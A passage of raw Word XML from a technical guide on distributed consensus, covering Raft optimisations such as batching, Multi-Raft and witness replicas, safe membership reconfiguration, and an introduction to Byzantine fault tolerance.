      </w:r>
    </w:p>
    <w:p w14:paraId="72950F3C" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  Leader sends entry 1 → entry 2 → entry 3 (without waiting for acks)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B766F0D" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  Followers process in order, ACK each.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698F221B" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  Leader commits in order as ACKs arrive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331C6497" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634BB538" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Higher throughput (utilizes network bandwidth better).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A74004E" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Same latency per individual entry.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3C9DCD" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Batching:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537ED023" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4303A28F" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Collect multiple client requests before proposing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D802B9A" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  Client requests arrive: [A, B, C, D, E]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3915A31D" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  Leader batches into single log entry: [A, B, C, D, E]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1F663B" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  One consensus round commits all 5.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A19EFA" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045CC9D8" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Amortizes consensus overhead across multiple requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B821F5" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Parallel appends (Multi-Raft):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10FBA094" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204C08E3" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Instead of one Raft group for all data:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FFDAC02" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  Range 1: Raft group 1 (leader on Node A)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61BC7D66" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  Range 2: Raft group 2 (leader on Node B)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1723A67F" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  Range 3: Raft group 3 (leader on Node C)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB713F4" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03854BDD" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Total throughput = sum of all groups (distributed across all nodes).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBC170E" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Not limited by single-leader bottleneck.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69CD4FA5" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Witness/learner replicas:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04756BCD" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B53871" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Problem: 5-node cluster means leader must send to 4 followers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E431DE4" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  But we only need majority (3 including self) = send to 2 for commit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FDEA1AD" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  Other 2 are for durability/read-scaling, not for commit quorum.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AED286A" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E"/>
    <w:p w14:paraId="373437AF" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Optimization: 3 full replicas + 2 "witnesses" (vote but don't store full state).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694911DC" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  Witnesses participate in elections and voting but don't need full log.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333F043B" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  Cheaper to operate, still maintains quorum safety.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13922713" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:pict w14:anchorId="32EC8A2A">
          <v:rect id="_x0000_i6248" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F1BCFF" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0049626E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>11. Consensus Reconfiguration (Membership Changes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CEC6C37" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0049626E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>11.1 The Problem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35002AD6" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627817B3" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Adding or removing nodes from a consensus cluster is dangerous:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34322491" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E"/>
    <w:p w14:paraId="02B18FCB" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Old configuration: {A, B, C} — majority = 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E60C4D" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>New configuration: {A, B, C, D, E} — majority = 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4472D099" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E"/>
    <w:p w14:paraId="03B95A46" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>If some nodes see old config and some see new config simultaneously:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C8D6FD" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  {A, B} form a majority under old config → elect leader.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BECA484" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  {C, D, E} form a majority under new config → elect ANOTHER leader.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5070387D" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  TWO LEADERS → split brain!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C33F9C2" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0049626E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>11.2 Raft Joint Consensus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71018C52" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637127F0" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Original Raft solution (two-phase):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07160FA9" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E"/>
    <w:p w14:paraId="74638854" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Phase 1: Transition to JOINT configuration (C_old,new)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2971F8BA" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  Requires majorities from BOTH old AND new configurations to commit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145FB4F1" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36AD2BF6" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Phase 2: Transition to new configuration (C_new)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7C4EDD" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  Once C_old,new is committed: safe to switch to C_new.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37EA4D9A" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E"/>
    <w:p w14:paraId="32AFD434" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>At no point can two independent majorities form:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6C9EC4" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  During C_old,new: need majority of old AND majority of new.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481390CE" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  Since both overlap with the joint config: no split.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A7133E" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0049626E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>11.3 Single-Step Reconfiguration (Simplified)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7199F448" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3D684A" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Simpler approach (used by etcd and most implementations):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D6BBB8" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  Only add or remove ONE node at a time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28EC5DB5" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E"/>
    <w:p w14:paraId="0ED3B6C2" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Why this is safe:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B16E752" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  Changing from 3 → 4 nodes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B5337E" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">    Old majority: 2/3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A85489C" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">    New majority: 3/4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363F485D" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">    Any majority of 4 overlaps with any majority of 3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C7DA66" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">    No split possible!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721240E3" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E"/>
    <w:p w14:paraId="41502965" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  Changing from 4 → 5 nodes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B50D4F1" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    Old majority: 3/4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270605CF" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">    New majority: 3/5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D198B06" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">    Safe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F74131" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E"/>
    <w:p w14:paraId="738CD0BC" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  Adding/removing 2+ nodes at once: UNSAFE (must be done one at a time).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C30B7A0" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:pict w14:anchorId="377D40BB">
          <v:rect id="_x0000_i6249" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="740174BA" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0049626E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>12. Byzantine Fault Tolerance (BFT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E7EA4B" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0049626E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>12.1 When Byzantine Tolerance Is Needed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1440A6" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3600EE75" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Crash faults: Node stops responding (crash, power failure, network disconnect).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC8C349" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  → Raft/Paxos handle this (2f+1 nodes for f crash faults).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF8BDFC" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E"/>
    <w:p w14:paraId="0D9D26B2" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Byzantine faults: Node behaves ARBITRARILY (sends conflicting messages, lies, corrupts data).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E22C57" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  → Raft/Paxos do NOT handle this.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FCBEFDA" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  → Need BFT protocols (3f+1 nodes for f byzantine faults).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DBD6DC4" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E"/>
    <w:p w14:paraId="5728BD70" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>When BFT is needed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F8453B" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  - Blockchain (untrusted participants)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F84D694" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  - Multi-party computation (mutually distrustful organizations)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0628C60F" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  - Military/aerospace (adversarial environment, radiation bit flips)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6542DC34" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51069DEB" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>When BFT is NOT needed (use Raft/Paxos instead):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E510D9" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  - Single-organization datacenter (nodes are trusted, just crash)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC40B75" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  - Cloud deployments (provider is trusted)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF84AF0" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  - 99.9% of backend systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765FC54E" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0049626E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>12.2 PBFT (Practical Byzantine Fault Tolerance)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="532145A9" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7A35D8" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
